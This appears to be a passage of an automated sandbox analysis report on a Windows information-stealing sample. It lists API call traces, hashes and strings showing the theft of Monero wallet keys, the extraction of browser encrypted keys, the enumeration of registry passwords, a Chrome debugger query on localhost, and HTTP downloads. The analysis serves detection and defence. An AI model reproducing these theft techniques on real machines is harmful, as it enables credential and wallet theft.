                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A362D0: InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                        • Part of subcall function 00A362D0: StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                        • Part of subcall function 00A362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                        • Part of subcall function 00A362D0: HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                        • Part of subcall function 00A362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                        • Part of subcall function 00A362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45568
                                      • lstrlen.KERNEL32(00000000), ref: 00A4557F
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00A455B4
                                      • lstrlen.KERNEL32(00000000), ref: 00A455D3
                                      • lstrlen.KERNEL32(00000000), ref: 00A455FE
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: a634d4f2f498535ea073fecc5bc3502fd563767ef24059c58af720ff3785e3c0
                                      • Instruction ID: 4e437de9935913e63b20b8066f1b4084b60f7ea9573d5490d5863fd45a852fe1
                                      • Opcode Fuzzy Hash: a634d4f2f498535ea073fecc5bc3502fd563767ef24059c58af720ff3785e3c0
                                      • Instruction Fuzzy Hash: 66510C78950508ABDB14FF60CEA6BED7739EFA0381F504468F40A5B592EB306F05CB62
                                      Function 00A41520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: dbaebf2f41b49505819ae01b5291514af1b6ed56e03d03b0ae2da8fdbcb562db
                                      • Instruction ID: a3c562034a03b6005287d18536185aacf4177c1408d2619d8cc35261137386cc
                                      • Opcode Fuzzy Hash: dbaebf2f41b49505819ae01b5291514af1b6ed56e03d03b0ae2da8fdbcb562db
                                      • Instruction Fuzzy Hash: B6C1A6B9D402199BCB14EF60DD99FDE7379BFA4304F004598F50997242EA70EA85CFA1
                                      Function 00A444D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A4453C
                                      • lstrcat.KERNEL32(?,0131EB98), ref: 00A4455B
                                      • lstrcat.KERNEL32(?,?), ref: 00A4456F
                                      • lstrcat.KERNEL32(?,0131D380), ref: 00A44583
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F20: GetFileAttributesA.KERNEL32(00000000,?,00A31B94,?,?,00A5577C,?,?,00A50E22), ref: 00A48F2F
                                        • Part of subcall function 00A3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A3A489
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A49550: GlobalAlloc.KERNEL32(00000000,00A4462D,00A4462D), ref: 00A49563
                                      • StrStrA.SHLWAPI(?,0131ED78), ref: 00A44643
                                      • GlobalFree.KERNEL32(?), ref: 00A44762
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                        • Part of subcall function 00A3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                        • Part of subcall function 00A3A210: LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A446F3
                                      • StrCmpCA.SHLWAPI(?,00A508D2), ref: 00A44710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A44722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A44735
                                      • lstrcat.KERNEL32(00000000,00A50FA0), ref: 00A44744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 25299dbb71a58aae688ab80d2aa4dd6eae846f6ba668fd9091d73027252f52fd
                                      • Instruction ID: 049e401151644782200ef12abd65c8b290a4570edf42a6c92920c20a427860ee
                                      • Opcode Fuzzy Hash: 25299dbb71a58aae688ab80d2aa4dd6eae846f6ba668fd9091d73027252f52fd
                                      • Instruction Fuzzy Hash: BA7156B6D00218ABDB14EBB0DD5AFDE7379AB98300F004598F60997181EB35EB59CF61
                                      Function 00A31310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A312B4
                                        • Part of subcall function 00A312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A312BB
                                        • Part of subcall function 00A312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A312D7
                                        • Part of subcall function 00A312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A312F5
                                        • Part of subcall function 00A312A0: RegCloseKey.ADVAPI32(?), ref: 00A312FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3134F
                                      • lstrlen.KERNEL32(?), ref: 00A3135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00A31377
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A31465
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A314EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 00914606dceb808cc995bcae8a35a8f8c68e9da9efc403cd217081877d449bac
                                      • Instruction ID: 217a0808841db58250965006c486fcb2ce4939c8547cee9995e0f36d2b283d45
                                      • Opcode Fuzzy Hash: 00914606dceb808cc995bcae8a35a8f8c68e9da9efc403cd217081877d449bac
                                      • Instruction Fuzzy Hash: 085156B5D502185BDB55FB60DE92FED733CAFA4300F4045D8B60A62092EE306F89CB65
                                      Function 00A39A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(00A50AF6,00000001,00000000,00000000,00000000), ref: 00A39A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00A39AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00A39AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: e8ea6735c5cea35c8f43f822bc6d33667e39e534cb23cf6564a043db4e1402a0
                                      • Instruction ID: ca0b0b42b3be1a526c78d0e715582730a159a704c5dc29fe0951df3c2e6672fb
                                      • Opcode Fuzzy Hash: e8ea6735c5cea35c8f43f822bc6d33667e39e534cb23cf6564a043db4e1402a0
                                      • Instruction Fuzzy Hash: 2B412D35A10258EBCB14EFA4CD95FDE7778BB48740F104154F609AB190CBB4AE84CF60
                                      Function 00A37630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A3739A
                                        • Part of subcall function 00A37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A37411
                                        • Part of subcall function 00A37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A3746D
                                        • Part of subcall function 00A37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00A374B2
                                        • Part of subcall function 00A37330: HeapFree.KERNEL32(00000000), ref: 00A374B9
                                      • lstrcat.KERNEL32(00000000,00A5192C), ref: 00A37666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A376A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00A376BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A376EF
                                      • lstrcat.KERNEL32(00000000,00A51934), ref: 00A37700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A37733
                                      • lstrcat.KERNEL32(00000000,00A51938), ref: 00A3774D
                                      • task.LIBCPMTD ref: 00A3775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: 31e180dbfa9ba9bedc985afa531444b2463b80e7ba08bc3349f311fac37320aa
                                      • Instruction ID: cdae752a31ad464d74aaae82c9c07f60cbe316eee697710ee60aea18c1fcba1d
                                      • Opcode Fuzzy Hash: 31e180dbfa9ba9bedc985afa531444b2463b80e7ba08bc3349f311fac37320aa
                                      • Instruction Fuzzy Hash: 8E3122B5D04209EBDB04DBB4DDA6EFF7779BB44301F104618F506AB3A1DA34A945CB60
                                      Function 00A48290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0131E970,00000000,?,00A50E14,00000000,?,00000000), ref: 00A482C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A482C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A482E8
                                      • __aulldiv.LIBCMT ref: 00A48302
                                      • __aulldiv.LIBCMT ref: 00A48310
                                      • wsprintfA.USER32 ref: 00A4833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: d2746068a1a917ad574ad4c71703fe7632e75ea5bd9d0aafff979dea2b10b02b
                                      • Instruction ID: b1acaf25de8bac790be2cfc83c53b97ca1a8677eb37898d54c96c6c7819c6a71
                                      • Opcode Fuzzy Hash: d2746068a1a917ad574ad4c71703fe7632e75ea5bd9d0aafff979dea2b10b02b
                                      • Instruction Fuzzy Hash: 38213DB1E44308ABDB00DFD4DD4AFAEB7B8FB44B10F104509F619BB280C77869018BA5
                                      Function 00A360F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                      • InternetOpenA.WININET(00A50DFB,00000001,00000000,00000000,00000000), ref: 00A3615F
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A361DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A36203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00A3622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A3625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00A36299
                                      • InternetCloseHandle.WININET(?), ref: 00A362A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00A362B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
